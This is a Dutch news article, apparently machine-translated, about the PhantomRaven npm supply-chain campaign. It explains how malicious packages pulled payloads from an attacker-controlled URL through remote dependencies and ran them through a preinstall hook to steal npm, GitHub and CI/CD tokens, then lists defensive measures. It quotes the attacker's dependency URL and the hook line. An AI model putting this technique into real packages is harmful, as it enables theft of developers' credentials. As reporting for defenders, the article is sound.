Cybertech Europe 2026 - Officiële mediapartner van de IT-industrie
Abonneren

Blijf op de hoogte van het belangrijkste nieuws

Door op de knop Abonneren te klikken, bevestigt u dat u onze voorwaarden hebt gelezen en ermee akkoord gaat. privacybeleid En gebruiksvoorwaarden
Neem contact met ons op

PhantomRaven npm supply chain-aanval – 126 kwaadaardige npm-pakketten en verborgen afhankelijkheden

PhantomRaven npm supply chain-aanval – 126 kwaadaardige npm-pakketten en verborgen afhankelijkheden PhantomRaven npm supply chain-aanval – 126 kwaadaardige npm-pakketten en verborgen afhankelijkheden
De PhantomRaven-campagne maakt gebruik van verborgen npm-afhankelijkheden om malware te verspreiden.

De voortdurende PhantomRaven npm-aanvoerketenaanval is een geavanceerde malwarecampagne die zich richt op ontwikkelaars wereldwijd. Sinds augustus 2025 verspreidt de aanval zich 126 schadelijke npm-pakketten die samen meer dan eens zijn gedownload 86.000 keer. Het doel is om npm-authenticatietokens, GitHub-inloggegevens en CI/CD-geheimen, terwijl geavanceerde detectie-ontwijkingstechnieken worden gebruikt om de meeste beveiligingstools te omzeilen.

Analist bij Koi-beveiliging identificeerde de campagne in oktober 2025 toen hun gedragsmonitoringsysteem, Wings, verdachte netwerkactiviteit signaleerde tijdens de installatie van pakketten. Alle kwaadaardige pakketten deden externe verzoeken aan hetzelfde domein, wat onthulde een gecoördineerde en mondiale Operatie.

PhantomRaven NPM Supply Chain-aanval – 126 kwaadaardige NPM-pakketten en verborgen afhankelijkheden | IT-sector

Hoe de PhantomRaven NPM-aanvoerketenaanval werkt

Het onderzoek van Koi-onderzoekers bracht een duidelijke tijdlijn aan het licht. De eerste 21 pakketten werden ontdekt en verwijderd in augustus 2025. Kort daarna pasten de aanvallers hun strategie aan en slaagden ze erin om tussen september en oktober nog eens 80 pakketten te publiceren die de standaard detectiemechanismen volledig ontweken. De infrastructuur van de aanvaller vertoont een contrast tussen technologisch geavanceerde uitvoering en verrassend onzorgvuldige operationele beveiliging.

  • Cybertech Europe 2026, een cybersecurityconferentie in Rome met de IT-sector als officiële mediapartner.
    Cybertech Europe 2026 is een van Europa's toonaangevende cybersecurityconferenties en brengt cybersecurityleiders, overheidsfunctionarissen, technologie-innovatoren, startups, investeerders en besluitvormers uit het bedrijfsleven samen in Rome. De IT-industrie is een officiële mediapartner en verzorgt verslaggeving van het evenement, interviews met leidinggevenden, inzichten in de sector en cybersecuritynieuws voor een Noord-Europees en Europees publiek.
    ADVERTENTIE

  • Maciek Szczesniak was te zien op de podcastbanner van IT-Branschen Wire Channel Magic Chats
    Maciek Szczesniak is te gast in Magic Chats op het IT-Branschen Wire Channel, waar hij spreekt over leiderschap, innovatie, digitale transformatie en zakelijke dienstverlening.
    GESPONSORD

  • Het Scandinavische technologieplatform voor de IT-industrie, met nieuws over cybersecurity, cloud, AI, digitale transformatie, channel, MSP en enterprise IT.
    Het IT-platform is een toonaangevend Scandinavisch technologieplatform dat nieuws brengt over cybersecurity, kunstmatige intelligentie, cloud computing, enterprise IT, digitale transformatie, managed services, channel partners, softwareontwikkeling, telecommunicatie, datacenters, IT-infrastructuur, technologisch leiderschap, bedrijfsinnovatie en opkomende technologieën. Via interviews met leidinggevenden, brancheanalyses, verslaggeving van evenementen, opinies, productlanceringen, updates van leveranciers en marktinzichten verbindt het IT-platform technologiebesluitvormers, CIO's, CISO's, CTO's, IT-managers, MSP's, resellers, distributeurs, technologieleveranciers, startups en grote organisaties in Zweden, Noorwegen, Denemarken, Finland en Europa. De berichtgeving omvat cybersecuritytrends, de adoptie van AI, cloudstrategie, bedrijfssoftware, netwerken, digitale infrastructuur, duurzaamheid, compliance, governance, risicomanagement, automatisering, data-analyse en toekomstige technologische ontwikkelingen.
    EIGEN INHOUD

  • VORTIQ-X AI Governance helpt bedrijven AI om te zetten in beheersbare en verifieerbare bedrijfswaarde.
    VORTIQ-X is een AI-governanceplatform dat organisaties helpt bij het beheren, verifiëren en creëren van meetbare bedrijfswaarde met behulp van AI. Het platform richt zich op transparantie, compliance, AI-governance en het effectieve gebruik van AI in bedrijfskritische processen.
    ADVERTENTIE

Om de kwaadaardige code te verbergen, gebruikten de aanvallers een techniek met externe dynamische afhankelijkheden. Hiermee kunnen afhankelijkheden worden gedefinieerd via HTTP-URL's in plaats van via het npm-register, bijvoorbeeld:
“ui-styles-pkg”: “http://packages.storeartifact.com/ui-styles-pkg.tgz”.
Wanneer een dergelijk pakket wordt geïnstalleerd, haalt npm automatisch de externe afhankelijkheid op zonder enige beveiligingsvalidatie of transparantie.

Dit betekent dat de code die wordt geüpload naar npmjs.com kan er volkomen onschadelijk uitzien – vaak gewoon een "hello world"-script – terwijl de daadwerkelijke schadelijke payload dynamisch wordt opgehaald van de server van de aanvaller bij installatie. Op deze manier omzeilen PhantomRaven-aanvallers zowel statische codeanalyse als afhankelijkheidsscans.

Verborgen afhankelijkheden en automatische uitvoering

Wanneer de onzichtbare afhankelijkheid op het systeem van het slachtoffer arriveert, wordt de schadelijke code onmiddellijk geactiveerd via het levenscyclusscript van NPM. De gemanipuleerde pakket.jsonHet bestand bevat een pre-installatiescript, "preinstall": "node index.js", dat automatisch wordt uitgevoerd zonder medeweten van de gebruiker. Het maakt niet uit hoe diep in de dependency tree het pakket zich bevindt – elke installatie van een ogenschijnlijk legitiem pakket kan de kwaadaardige uitvoering activeren.

De PhantomRaven npm-aanvoerketenaanval Hiermee wordt de inherente flexibiliteit van npm benut om kwaadaardige code in realtime te leveren. Omdat elke installatie de afhankelijkheid opnieuw van de server van de aanvaller ophaalt, kan de payload ook worden aangepast aan de doelomgeving, waardoor de aanval zeer moeilijk te bestrijden is. detecteren en stoppen.

Wat de aanvallers verzamelen

Na een succesvolle installatie verzamelt PhantomRaven systematisch e-mailadressen uit omgevingsvariabelen, gitconfigbestanden, npmrc-configuraties en auteursvelden in pakket.json. Het exfiltreert ook CI/CD-referenties, waaronder GitHub Actions-tokens, GitLab CI-sleutels, Jenkins-inloggegevens, CircleCI-tokens En npm publiceert tokens.

De malware voert vervolgens een volledige systeemprofilering uit: openbare IP-adressen, hostnamen, besturingssystemen, Node.js-versies en netwerkconfiguraties worden verzameld om onderscheid te maken tussen bedrijfsnetwerken en individuele ontwikkelaarscomputers. Deze informatie wordt gebruikt om waardevolle doelen te identificeren waar aanvallers grotere toegang kunnen krijgen of zich kunnen verspreiden.

Operationele nalatigheid en tracking

Ondanks de technische bekwaamheid is de infrastructuur tekenen van operationele nalatigheid. Verschillende e-mailaccounts werden achtereenvolgens aangemaakt via gratis diensten – van [email protected] naar [email protected] – en gebruikersnaam als npmhell En npmpackagejpd komt in meerdere pakketten voor. Deze inconsistentie heeft onderzoekers in staat gesteld de campagne te herleiden tot één enkele actor, wat hoop biedt op toekomstige identificatie en vervolging.

PhantomRaven NPM Supply Chain-aanval – 126 kwaadaardige NPM-pakketten en verborgen afhankelijkheden | IT-sector

Aanbevolen beschermende maatregelen

  1. Roteer alle tokens en API-sleutels (GitHub, npm, CI/CD) die mogelijk zijn blootgesteld.
  2. Weergave pakket.jsonbestanden en identificeer eventuele afhankelijkheden die verwijzen naar HTTP-URL's. Blokkeer of verwijder deze.
  3. Implementeer SBOM-tools zoals CycloneDX of SPDX om volledig inzicht te krijgen in afhankelijkheden en versiegeschiedenis.
  4. Beperk tokenmachtigingen, gebruik kortstondige geheimen en schakel automatische rotatie in.
  5. Introduceer gedragscontrole in CI/CD-omgevingen, zoals sandbox-analyse van nieuwe pakketten voordat ze worden geïmplementeerd.
  6. Volgen OWASP Software Component Verification Standard voor het veilig verwerken van afhankelijkheden van derden.
  7. Overweeg het gebruik van privé-NPM-registers en het valideren van afhankelijkheden voordat u publiceert om de kosten te verminderen. het risico voor manipulatie in open ecosystemen.
PhantomRaven NPM Supply Chain-aanval – 126 kwaadaardige NPM-pakketten en verborgen afhankelijkheden | IT-sector

Analyse en belang voor de industrie

De toenemende omvang van de aanvallen die PhantomRaven npm-aanvoerketenaanval laat duidelijk zien hoe de afhankelijkheidsketen een van de grootste kwetsbaarheden van software is geworden. Naarmate bedrijven verder bouwen aan open source en duizenden Pakketten van derden vergroten het risico dat één enkel gecompromitteerd onderdeel grote gevolgen heeft.

Voor IT-organisaties betekent dit dat beveiliging niet langer alleen draait om netwerken of eindgebruikers, maar om de hele ontwikkelketen. Veilig codebeheer, betrouwbare afhankelijkheden en continue analyse van de toeleveringsketen worden een strategische kwestie in plaats van een technisch detail.

De campagne laat ook zien dat aanvallers zijn gaan denken als ontwikkelaars: ze misbruiken bestaande functies in tools zoals npm om malware te verspreiden op een manier die volkomen legitiem lijkt. Dit vereist een verandering in de manier waarop bedrijven hun software monitoren en verifiëren.

Voor Zweedse en Scandinavische bedrijven onderstreept het evenement het belang van het opbouwen van expertise in beveiliging van de softwaretoeleveringsketen en om te voldoen aan internationale normen. Door proactieve controle, gedeelde informatie en open samenwerkingen kan de industrie beter voorbereid zijn op de volgende grote aanval.

Blijf op de hoogte van het belangrijkste nieuws

Door op de knop Abonneren te klikken, bevestigt u dat u onze voorwaarden hebt gelezen en ermee akkoord gaat. privacybeleid En gebruiksvoorwaarden
  • Maciek Szczesniak was te zien op de podcastbanner van IT-Branschen Wire Channel Magic Chats
    Maciek Szczesniak is te gast in Magic Chats op het IT-Branschen Wire Channel, waar hij spreekt over leiderschap, innovatie, digitale transformatie en zakelijke dienstverlening.
    GESPONSORD

  • VORTIQ-X AI Governance helpt bedrijven AI om te zetten in beheersbare en verifieerbare bedrijfswaarde.
    VORTIQ-X is een AI-governanceplatform dat organisaties helpt bij het beheren, verifiëren en creëren van meetbare bedrijfswaarde met behulp van AI. Het platform richt zich op transparantie, compliance, AI-governance en het effectieve gebruik van AI in bedrijfskritische processen.
    ADVERTENTIE

  • Cybertech Europe 2026, een cybersecurityconferentie in Rome met de IT-sector als officiële mediapartner.
    Cybertech Europe 2026 is een van Europa's toonaangevende cybersecurityconferenties en brengt cybersecurityleiders, overheidsfunctionarissen, technologie-innovatoren, startups, investeerders en besluitvormers uit het bedrijfsleven samen in Rome. De IT-industrie is een officiële mediapartner en verzorgt verslaggeving van het evenement, interviews met leidinggevenden, inzichten in de sector en cybersecuritynieuws voor een Noord-Europees en Europees publiek.
    ADVERTENTIE

  • Het Scandinavische technologieplatform voor de IT-industrie, met nieuws over cybersecurity, cloud, AI, digitale transformatie, channel, MSP en enterprise IT.
    Het IT-platform is een toonaangevend Scandinavisch technologieplatform dat nieuws brengt over cybersecurity, kunstmatige intelligentie, cloud computing, enterprise IT, digitale transformatie, managed services, channel partners, softwareontwikkeling, telecommunicatie, datacenters, IT-infrastructuur, technologisch leiderschap, bedrijfsinnovatie en opkomende technologieën. Via interviews met leidinggevenden, brancheanalyses, verslaggeving van evenementen, opinies, productlanceringen, updates van leveranciers en marktinzichten verbindt het IT-platform technologiebesluitvormers, CIO's, CISO's, CTO's, IT-managers, MSP's, resellers, distributeurs, technologieleveranciers, startups en grote organisaties in Zweden, Noorwegen, Denemarken, Finland en Europa. De berichtgeving omvat cybersecuritytrends, de adoptie van AI, cloudstrategie, bedrijfssoftware, netwerken, digitale infrastructuur, duurzaamheid, compliance, governance, risicomanagement, automatisering, data-analyse en toekomstige technologische ontwikkelingen.
    EIGEN INHOUD